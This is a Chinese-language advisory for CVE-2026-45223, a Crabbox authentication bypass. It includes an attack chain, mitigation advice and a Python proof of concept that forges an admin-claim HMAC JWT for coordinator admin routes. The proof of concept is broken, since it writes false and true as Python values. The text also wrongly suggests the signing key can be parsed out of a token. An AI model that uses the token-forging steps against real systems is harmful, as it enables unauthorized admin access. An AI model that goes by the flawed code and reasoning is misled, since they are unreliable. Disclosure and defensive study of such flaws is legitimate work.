CVE-2026-45223 Crabbox认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-45223

漏洞类型

认证绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Crabbox

漏洞概述

Crabbox在0.9.0之前的版本中存在严重的认证绕过漏洞。该漏洞源于协调器用户令牌验证路径中的verifyUserToken()函数未能正确拒绝包含admin声明的载荷。攻击者利用此漏洞，仅需获取共享的非管理员令牌，即可伪造带有admin权限的令牌，进而绕过验证机制，获取完全的协调器管理员权限，实现对租约可见性、池状态管理和强制释放操作的控制。

技术细节

该漏洞的核心逻辑缺陷在于Crabbox的令牌验证机制。在验证用户令牌时，verifyUserToken()函数仅校验了签名的有效性（HMAC-SHA256），但未校验令牌中包含的声明是否与当前用户权限匹配。由于系统使用共享密钥进行签名，攻击者在获得非管理员令牌后，可以解析出密钥或利用已知逻辑，构造一个新的令牌载荷，将admin字段设置为true。随后，攻击者使用相同的密钥对该伪造令牌进行签名。由于签名验证通过且服务端未对admin声明进行二次校验（即未检查该用户是否真实拥有管理员角色），系统错误地将请求视为来自管理员，从而允许访问受保护的协调器路由，导致权限提升。

攻击链分析

STEP 1

步骤1：获取基础访问权限

攻击者获取Crabbox实例的共享非管理员令牌，该令牌通常用于常规操作。

STEP 2

步骤2：分析令牌签名机制

攻击者分析令牌结构，确定其使用HMAC-SHA256签名，并推测或获取用于签名的共享密钥。

STEP 3

步骤3：构造恶意令牌

攻击者修改令牌载荷，将admin声明设置为true，并使用获取到的密钥重新生成有效的签名。

STEP 4

步骤4：权限提升

攻击者将伪造的令牌发送至仅管理员可访问的协调器API端点，服务器验证签名通过后赋予管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import hmac
import hashlib
import base64
import json

# Simulating the token structure and signing
# This is a conceptual PoC based on the description

secret_key = b'shared_secret_key' # Attacker needs to obtain or guess this

# Original payload (non-admin)
original_payload = {
    "user": "standard_user",
    "admin": false
}

# Malicious payload (escalated privileges)
malicious_payload = {
    "user": "standard_user",
    "admin": true
}

def generate_token(payload, secret):
    # In a real scenario, this would match the exact implementation (e.g., JWT)
    header = {"alg": "HS256", "typ": "JWT"}
    header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
    payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')
    
    message = f"{header_b64}.{payload_b64}"
    signature = hmac.new(secret, message.encode(), hashlib.sha256).digest()
    signature_b64 = base64.urlsafe_b64encode(signature).decode().rstrip('=')
    
    return f"{message}.{signature_b64}"

# Generate the forged admin token
forged_token = generate_token(malicious_payload, secret_key)
print(f"Forged Admin Token: {forged_token}")

# Attacker sends this token to admin-only routes
# e.g., GET /admin/pools with Authorization: Bearer {forged_token}

影响范围

Crabbox < 0.9.0

防御指南

临时缓解措施

建议立即将Crabbox升级至v0.9.0或更高版本以修复此漏洞。在无法立即升级的情况下，应严格限制对协调器端口的网络访问，仅允许可信的内部IP连接，并监控异常的API调用行为。